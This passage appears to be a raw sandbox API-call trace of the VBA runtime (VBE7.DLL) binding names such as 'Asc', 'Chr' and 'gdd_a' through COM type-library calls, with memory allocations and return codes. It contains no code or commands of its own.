pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000) returned 0x0 [0160.794] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0160.794] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc5c8 | out: ppvObject=0x1dc5c8*=0x0) returned 0x80004002 [0160.794] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dc5a8, pDummy=0x10 | out: ppTypeAttr=0x1dc5a8, pDummy=0x10) returned 0x0 [0160.794] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0160.794] IUnknown:AddRef (This=0xa02b108) returned 0x6 [0160.794] IUnknown:Release (This=0xa02b108) returned 0x5 [0160.794] IUnknown:Release (This=0xa02b108) returned 0x4 [0160.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a0246, cbMultiByte=4, lpWideCharStr=0x1dc590, cchWideChar=5 | out: lpWideCharStr="Asc") returned 4 [0160.794] ITypeComp:RemoteBind (in: This=0xa02b110, szName="Asc", lHashVal=0x107521, wFlags=0x3, ppTInfo=0x1dc548, pDescKind=0x1dc55c, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc548*=0x0, pDescKind=0x1dc55c*=0, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a0246, cbMultiByte=4, lpWideCharStr=0x1dc5d0, cchWideChar=5 | out: lpWideCharStr="Asc") returned 4 [0160.795] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="Asc", lHashVal=0x107521, wFlags=0x3, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0xa121698, pDescKind=0x1dc59c*=1, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.795] ITypeInfo:RemoteGetTypeAttr (in: This=0xa121698, ppTypeAttr=0x1dc590, pDummy=0x1 | out: ppTypeAttr=0x1dc590, pDummy=0x1) returned 0x0 [0160.795] ITypeInfo:LocalReleaseTypeAttr (This=0xa121698) returned 0x0 [0160.795] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1dc3f0 | out: ppvObject=0x1dc3f0*=0xa121698) returned 0x0 [0160.795] ITypeInfo2:GetFuncIndexOfMemId (in: This=0xa121698, memid=1610612736, invkind=1, pFuncIndex=0x1dc430 | out: pFuncIndex=0x1dc430*=0x0) returned 0x0 [0160.795] ITypeInfo2:GetFuncCustData (in: This=0xa121698, index=0x0, GUID=0x7fee51d3758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x1dc448 | out: pVarVal=0x1dc448*(varType=0x0, wReserved1=0x1d, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x107521)) returned 0x0 [0160.795] IUnknown:Release (This=0xa121698) returned 0x6 [0160.795] IUnknown:AddRef (This=0xa121698) returned 0x7 [0160.795] ITypeInfo:LocalReleaseFuncDesc (This=0xa121698) returned 0x0 [0160.795] IUnknown:Release (This=0xa121698) returned 0x6 [0160.795] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc6b8 | out: ppvObject=0x1dc6b8*=0x0) returned 0x80004002 [0160.795] IUnknown:AddRef (This=0xa121698) returned 0x7 [0160.795] IUnknown:Release (This=0xa121698) returned 0x6 [0160.795] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc828 | out: ppvObject=0x1dc828*=0x0) returned 0x80004002 [0160.796] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc820 | out: ppvObject=0x1dc820*=0x0) returned 0x80004002 [0160.796] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc060, pIndex=0x0 | out: ppTLib=0x1dc060*=0x9ab5f00, pIndex=0x0) returned 0x0 [0160.796] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc070, pDummy=0x0 | out: ppTLibAttr=0x1dc070, pDummy=0x0) returned 0x0 [0160.796] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0160.796] IUnknown:Release (This=0x9ab5f00) returned 0xd [0160.796] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612736, invkind=1, refPtrFlags=0x1dc060, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0160.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0160.796] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612736, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc060, pbstrName=0x0, pwOrdinal=0x1dc080 | out: pBstrDllName=0x1dc060*=0x0, pbstrName=0x0, pwOrdinal=0x1dc080*=0xc2f0) returned 0x0 [0160.796] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612736, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000) returned 0x0 [0160.796] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0160.796] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0160.796] GetCurrentProcess () returned 0xffffffffffffffff [0160.796] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x3b) returned 1 [0160.796] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0160.796] IMalloc:Alloc (This=0x7fefecb5380, cb=0x230) returned 0x95e3b70 [0160.797] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0160.797] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc5c8 | out: ppvObject=0x1dc5c8*=0x0) returned 0x80004002 [0160.797] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dc5a8, pDummy=0x10 | out: ppTypeAttr=0x1dc5a8, pDummy=0x10) returned 0x0 [0160.797] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0160.797] IUnknown:AddRef (This=0xa02b108) returned 0x6 [0160.798] IUnknown:Release (This=0xa02b108) returned 0x5 [0160.798] IUnknown:Release (This=0xa02b108) returned 0x4 [0160.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a0222, cbMultiByte=3, lpWideCharStr=0x1dc590, cchWideChar=4 | out: lpWideCharStr="fg") returned 3 [0160.798] ITypeComp:RemoteBind (in: This=0xa02b110, szName="fg", lHashVal=0x105d3a, wFlags=0x5, ppTInfo=0x1dc548, pDescKind=0x1dc55c, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc548*=0x0, pDescKind=0x1dc55c*=0, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a0222, cbMultiByte=3, lpWideCharStr=0x1dc5d0, cchWideChar=4 | out: lpWideCharStr="fg") returned 3 [0160.798] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="fg", lHashVal=0x105d3a, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a0222, cbMultiByte=3, lpWideCharStr=0x1dc5d0, cchWideChar=4 | out: lpWideCharStr="fg") returned 3 [0160.798] ITypeComp:RemoteBind (in: This=0x9ab4b60, szName="fg", lHashVal=0x105d3a, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a0222, cbMultiByte=3, lpWideCharStr=0x1dc5d0, cchWideChar=4 | out: lpWideCharStr="fg") returned 3 [0160.798] ITypeComp:RemoteBind (in: This=0x9ab64b0, szName="fg", lHashVal=0x105d3a, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a0222, cbMultiByte=3, lpWideCharStr=0x1dc5d0, cchWideChar=4 | out: lpWideCharStr="fg") returned 3 [0160.798] ITypeComp:RemoteBind (in: This=0x9ab6a50, szName="fg", lHashVal=0x105d3a, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.798] IMalloc:Alloc (This=0x7fefecb5380, cb=0xa) returned 0xa2b6550 [0160.799] _mbscpy_s (in: _Dst=0xa2b6550, _DstSizeInBytes=0x3, _Src=0x63a0222 | out: _Dst=0xa2b6550) returned 0x0 [0160.799] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_fg") returned 0x10f1e2 [0160.799] strcpy_s (in: _Dst=0x1dc6e0, _DstSize=0xa, _Src="_B_var_fg" | out: _Dst="_B_var_fg") returned 0x0 [0160.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dc6e0, cbMultiByte=10, lpWideCharStr=0x1dc530, cchWideChar=10 | out: lpWideCharStr="_B_var_fg") returned 10 [0160.799] IUnknown:AddRef (This=0x9ab5f00) returned 0xe [0160.799] ITypeLib:RemoteIsName (in: This=0x9ab5f00, szNameBuf="_B_var_fg", lHashVal=0x10f1e2, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0160.799] IUnknown:Release (This=0x9ab5f00) returned 0xd [0160.799] IUnknown:AddRef (This=0x9ab4b50) returned 0x22 [0160.799] ITypeLib:RemoteIsName (in: This=0x9ab4b50, szNameBuf="_B_var_fg", lHashVal=0x10f1e2, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0160.799] IUnknown:Release (This=0x9ab4b50) returned 0x21 [0160.799] IUnknown:AddRef (This=0x9ab64a0) returned 0x6 [0160.799] ITypeLib:RemoteIsName (in: This=0x9ab64a0, szNameBuf="_B_var_fg", lHashVal=0x10f1e2, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0160.799] IUnknown:Release (This=0x9ab64a0) returned 0x5 [0160.799] IUnknown:AddRef (This=0x9ab6a40) returned 0x4 [0160.799] ITypeLib:RemoteIsName (in: This=0x9ab6a40, szNameBuf="_B_var_fg", lHashVal=0x10f1e2, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0160.799] IUnknown:Release (This=0x9ab6a40) returned 0x3 [0160.799] IUnknown:AddRef (This=0x9ab5f00) returned 0xe [0160.799] IUnknown:Release (This=0x9ab5f00) returned 0xd [0160.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a085e, cbMultiByte=10, lpWideCharStr=0x1dc590, cchWideChar=11 | out: lpWideCharStr="_B_var_fg") returned 10 [0160.800] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="_B_var_fg", lHashVal=0x10f1e2, wFlags=0x5, ppTInfo=0x1dc548, pDescKind=0x1dc55c, ppFuncDesc=0x1dc560, ppVarDesc=0x66005f00720061, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc548*=0x0, pDescKind=0x1dc55c*=0, ppFuncDesc=0x1dc560, ppVarDesc=0x66005f00720061, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.800] _mbscpy_s (in: _Dst=0x1dc750, _DstSizeInBytes=0x3, _Src=0x63a0222 | out: _Dst=0x1dc750) returned 0x0 [0160.800] IMalloc:Free (This=0x7fefecb5380, pv=0xa2b6550) [0160.800] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0160.800] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc5c8 | out: ppvObject=0x1dc5c8*=0x0) returned 0x80004002 [0160.800] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dc5a8, pDummy=0x10 | out: ppTypeAttr=0x1dc5a8, pDummy=0x10) returned 0x0 [0160.800] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0160.800] IUnknown:AddRef (This=0xa02b108) returned 0x6 [0160.801] IUnknown:Release (This=0xa02b108) returned 0x5 [0160.801] IUnknown:Release (This=0xa02b108) returned 0x4 [0160.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732c22, cbMultiByte=4, lpWideCharStr=0x1dc590, cchWideChar=5 | out: lpWideCharStr="Chr") returned 4 [0160.801] ITypeComp:RemoteBind (in: This=0xa02b110, szName="Chr", lHashVal=0x107e4b, wFlags=0x3, ppTInfo=0x1dc548, pDescKind=0x1dc55c, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc548*=0x0, pDescKind=0x1dc55c*=0, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732c22, cbMultiByte=4, lpWideCharStr=0x1dc5d0, cchWideChar=5 | out: lpWideCharStr="Chr") returned 4 [0160.801] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="Chr", lHashVal=0x107e4b, wFlags=0x3, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732c22, cbMultiByte=4, lpWideCharStr=0x1dc5d0, cchWideChar=5 | out: lpWideCharStr="Chr") returned 4 [0160.801] ITypeComp:RemoteBind (in: This=0x9ab4b60, szName="Chr", lHashVal=0x107e4b, wFlags=0x3, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732c22, cbMultiByte=4, lpWideCharStr=0x1dc5d0, cchWideChar=5 | out: lpWideCharStr="Chr") returned 4 [0160.801] ITypeComp:RemoteBind (in: This=0x9ab64b0, szName="Chr", lHashVal=0x107e4b, wFlags=0x3, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732c22, cbMultiByte=4, lpWideCharStr=0x1dc5d0, cchWideChar=5 | out: lpWideCharStr="Chr") returned 4 [0160.801] ITypeComp:RemoteBind (in: This=0x9ab6a50, szName="Chr", lHashVal=0x107e4b, wFlags=0x3, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.801] IMalloc:Alloc (This=0x7fefecb5380, cb=0xb) returned 0xa2b6550 [0160.801] _mbscpy_s (in: _Dst=0xa2b6550, _DstSizeInBytes=0x4, _Src=0x5732c22 | out: _Dst=0xa2b6550) returned 0x0 [0160.801] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Chr") returned 0x103b5c [0160.802] strcpy_s (in: _Dst=0x1dc6e0, _DstSize=0xb, _Src="_B_var_Chr" | out: _Dst="_B_var_Chr") returned 0x0 [0160.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dc6e0, cbMultiByte=11, lpWideCharStr=0x1dc530, cchWideChar=11 | out: lpWideCharStr="_B_var_Chr") returned 11 [0160.802] IUnknown:AddRef (This=0x9ab5f00) returned 0xe [0160.802] ITypeLib:RemoteIsName (in: This=0x9ab5f00, szNameBuf="_B_var_Chr", lHashVal=0x103b5c, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=1, pBstrLibName=0x1dc530) returned 0x0 [0160.802] IUnknown:Release (This=0x9ab5f00) returned 0xd [0160.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_B_var_Chr", cchWideChar=-1, lpMultiByteStr=0x1dc6e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_B_var_Chr", lpUsedDefaultChar=0x0) returned 11 [0160.802] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Chr") returned 0x103b5c [0160.802] IUnknown:AddRef (This=0x9ab5f00) returned 0xe [0160.802] IUnknown:Release (This=0x9ab5f00) returned 0xd [0160.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a088a, cbMultiByte=11, lpWideCharStr=0x1dc590, cchWideChar=12 | out: lpWideCharStr="_B_var_Chr") returned 11 [0160.802] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="_B_var_Chr", lHashVal=0x103b5c, wFlags=0x3, ppTInfo=0x1dc548, pDescKind=0x1dc55c, ppFuncDesc=0x1dc560, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc548*=0xa121698, pDescKind=0x1dc55c*=1, ppFuncDesc=0x1dc560, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.802] ITypeInfo:RemoteGetTypeAttr (in: This=0xa121698, ppTypeAttr=0x1dc550, pDummy=0x1 | out: ppTypeAttr=0x1dc550, pDummy=0x1) returned 0x0 [0160.802] ITypeInfo:LocalReleaseTypeAttr (This=0xa121698) returned 0x0 [0160.802] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1dc3b0 | out: ppvObject=0x1dc3b0*=0xa121698) returned 0x0 [0160.802] ITypeInfo2:GetFuncIndexOfMemId (in: This=0xa121698, memid=1610612738, invkind=1, pFuncIndex=0x1dc3f0 | out: pFuncIndex=0x1dc3f0*=0x2) returned 0x0 [0160.802] ITypeInfo2:GetFuncCustData (in: This=0xa121698, index=0x2, GUID=0x7fee51d3758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x1dc408 | out: pVarVal=0x1dc408*(varType=0x0, wReserved1=0x1d, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x103b5c)) returned 0x0 [0160.802] IUnknown:Release (This=0xa121698) returned 0x7 [0160.802] IUnknown:AddRef (This=0xa121698) returned 0x8 [0160.802] ITypeInfo:LocalReleaseFuncDesc (This=0xa121698) returned 0x0 [0160.802] IUnknown:Release (This=0xa121698) returned 0x7 [0160.802] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc608 | out: ppvObject=0x1dc608*=0x0) returned 0x80004002 [0160.802] IUnknown:AddRef (This=0xa121698) returned 0x8 [0160.802] IUnknown:Release (This=0xa121698) returned 0x7 [0160.803] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc828 | out: ppvObject=0x1dc828*=0x0) returned 0x80004002 [0160.803] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc820 | out: ppvObject=0x1dc820*=0x0) returned 0x80004002 [0160.803] IMalloc:Free (This=0x7fefecb5380, pv=0xa2b6550) [0160.803] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc060, pIndex=0x0 | out: ppTLib=0x1dc060*=0x9ab5f00, pIndex=0x0) returned 0x0 [0160.803] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc070, pDummy=0x0 | out: ppTLibAttr=0x1dc070, pDummy=0x0) returned 0x0 [0160.803] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0160.803] IUnknown:Release (This=0x9ab5f00) returned 0xe [0160.803] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612738, invkind=1, refPtrFlags=0x1dc060, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0160.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0160.803] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc060, pbstrName=0x0, pwOrdinal=0x1dc080 | out: pBstrDllName=0x1dc060*=0x0, pbstrName=0x0, pwOrdinal=0x1dc080*=0xc2f0) returned 0x0 [0160.803] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000) returned 0x0 [0160.803] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0160.803] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0160.803] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0160.803] GetCurrentProcess () returned 0xffffffffffffffff [0160.803] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x43) returned 1 [0160.803] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0160.803] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0160.804] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc5c8 | out: ppvObject=0x1dc5c8*=0x0) returned 0x80004002 [0160.804] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dc5a8, pDummy=0x10 | out: ppTypeAttr=0x1dc5a8, pDummy=0x10) returned 0x0 [0160.804] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0160.804] IUnknown:AddRef (This=0xa02b108) returned 0x6 [0160.804] IUnknown:Release (This=0xa02b108) returned 0x5 [0160.804] IUnknown:Release (This=0xa02b108) returned 0x4 [0160.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a026a, cbMultiByte=6, lpWideCharStr=0x1dc590, cchWideChar=7 | out: lpWideCharStr="gdd_a") returned 6 [0160.804] ITypeComp:RemoteBind (in: This=0xa02b110, szName="gdd_a", lHashVal=0x10e717, wFlags=0x5, ppTInfo=0x1dc548, pDescKind=0x1dc55c, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc548*=0x0, pDescKind=0x1dc55c*=0, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a026a, cbMultiByte=6, lpWideCharStr=0x1dc5d0, cchWideChar=7 | out: lpWideCharStr="gdd_a") returned 6 [0160.804] ITypeComp:RemoteBind (in: This=0x9ab5f10, 